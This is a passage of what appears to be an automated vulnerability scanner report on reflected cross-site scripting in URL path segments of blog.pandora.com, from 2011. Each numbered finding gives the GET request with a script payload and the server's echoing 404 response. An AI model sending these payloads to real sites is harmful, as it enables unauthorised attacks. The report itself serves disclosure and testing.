Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:49 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5ee2e<script>alert(1)</script>224981c07fd/2008/03/ was not found on this server.</p>
...[SNIP]...

3.147. http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/03/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5184f<script>alert(1)</script>5f6e8db7f13 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20085184f<script>alert(1)</script>5f6e8db7f13/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20085184f<script>alert(1)</script>5f6e8db7f13/03/ was not found on this server.</p>
...[SNIP]...

3.148. http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/03/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dff11<script>alert(1)</script>9e8c2c2eee5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/03dff11<script>alert(1)</script>9e8c2c2eee5/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/03dff11<script>alert(1)</script>9e8c2c2eee5/ was not found on this server.</p>
...[SNIP]...

3.149. http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/04/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8b984<script>alert(1)</script>5934a17f05d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora8b984<script>alert(1)</script>5934a17f05d/archives/2008/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8b984<script>alert(1)</script>5934a17f05d/archives/2008/04/ was not found on this server.</p>
...[SNIP]...

3.150. http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/04/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload abb6d<script>alert(1)</script>79106cb9952 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesabb6d<script>alert(1)</script>79106cb9952/2008/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesabb6d<script>alert(1)</script>79106cb9952/2008/04/ was not found on this server.</p>
...[SNIP]...

3.151. http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/04/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 465a8<script>alert(1)</script>77d6f7cf9b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008465a8<script>alert(1)</script>77d6f7cf9b1/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008465a8<script>alert(1)</script>77d6f7cf9b1/04/ was not found on this server.</p>
...[SNIP]...

3.152. http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/04/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8193f<script>alert(1)</script>fa1c0f6c054 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/048193f<script>alert(1)</script>fa1c0f6c054/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/048193f<script>alert(1)</script>fa1c0f6c054/ was not found on this server.</p>
...[SNIP]...

3.153. http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/05/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fba06<script>alert(1)</script>415a42b75c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorafba06<script>alert(1)</script>415a42b75c1/archives/2008/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorafba06<script>alert(1)</script>415a42b75c1/archives/2008/05/ was not found on this server.</p>
...[SNIP]...

3.154. http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/05/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 189bf<script>alert(1)</script>7e15ac1b4e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives189bf<script>alert(1)</script>7e15ac1b4e2/2008/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives189bf<script>alert(1)</script>7e15ac1b4e2/2008/05/ was not found on this server.</p>
...[SNIP]...

3.155. http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/05/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload df6e5<script>alert(1)</script>6172eb86b30 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008df6e5<script>alert(1)</script>6172eb86b30/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008df6e5<script>alert(1)</script>6172eb86b30/05/ was not found on this server.</p>
...[SNIP]...

3.156. http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/05/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 150c1<script>alert(1)</script>9c01c9b532d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/05150c1<script>alert(1)</script>9c01c9b532d/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/05150c1<script>alert(1)</script>9c01c9b532d/ was not found on this server.</p>
...[SNIP]...

3.157. http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/06/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 15eb9<script>alert(1)</script>7a020e9b0eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora15eb9<script>alert(1)</script>7a020e9b0eb/archives/2008/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora15eb9<script>alert(1)</script>7a020e9b0eb/archives/2008/06/ was not found on this server.</p>
...[SNIP]...

3.158. http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/06/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec3a9<script>alert(1)</script>a9054eec92c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesec3a9<script>alert(1)</script>a9054eec92c/2008/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesec3a9<script>alert(1)</script>a9054eec92c/2008/06/ was not found on this server.</p>
...[SNIP]...

3.159. http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/06/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 46068<script>alert(1)</script>eee473a0b7a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200846068<script>alert(1)</script>eee473a0b7a/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200846068<script>alert(1)</script>eee473a0b7a/06/ was not found on this server.</p>
...[SNIP]...

3.160. http://blog.pandora.com/pandora/archives/2008/06/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/06/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c3962<script>alert(1)</script>2bd69b3ec0b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/06c3962<script>alert(1)</script>2bd69b3ec0b/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/06c3962<script>alert(1)</script>2bd69b3ec0b/ was not found on this server.</p>
...[SNIP]...

3.161. http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/07/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47138<script>alert(1)</script>a3f13374191 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora47138<script>alert(1)</script>a3f13374191/archives/2008/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:50 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora47138<script>alert(1)</script>a3f13374191/archives/2008/07/ was not found on this server.</p>
...[SNIP]...

3.162. http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/07/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e4152<script>alert(1)</script>d0196897ba0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivese4152<script>alert(1)</script>d0196897ba0/2008/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivese4152<script>alert(1)</script>d0196897ba0/2008/07/ was not found on this server.</p>
...[SNIP]...

3.163. http://blog.pandora.com/pandora/archives/2008/07/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/07/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 12ccb<script>alert(1)</script>30223f2cf54 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200812ccb<script>alert(1)</script>30223f2cf54/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
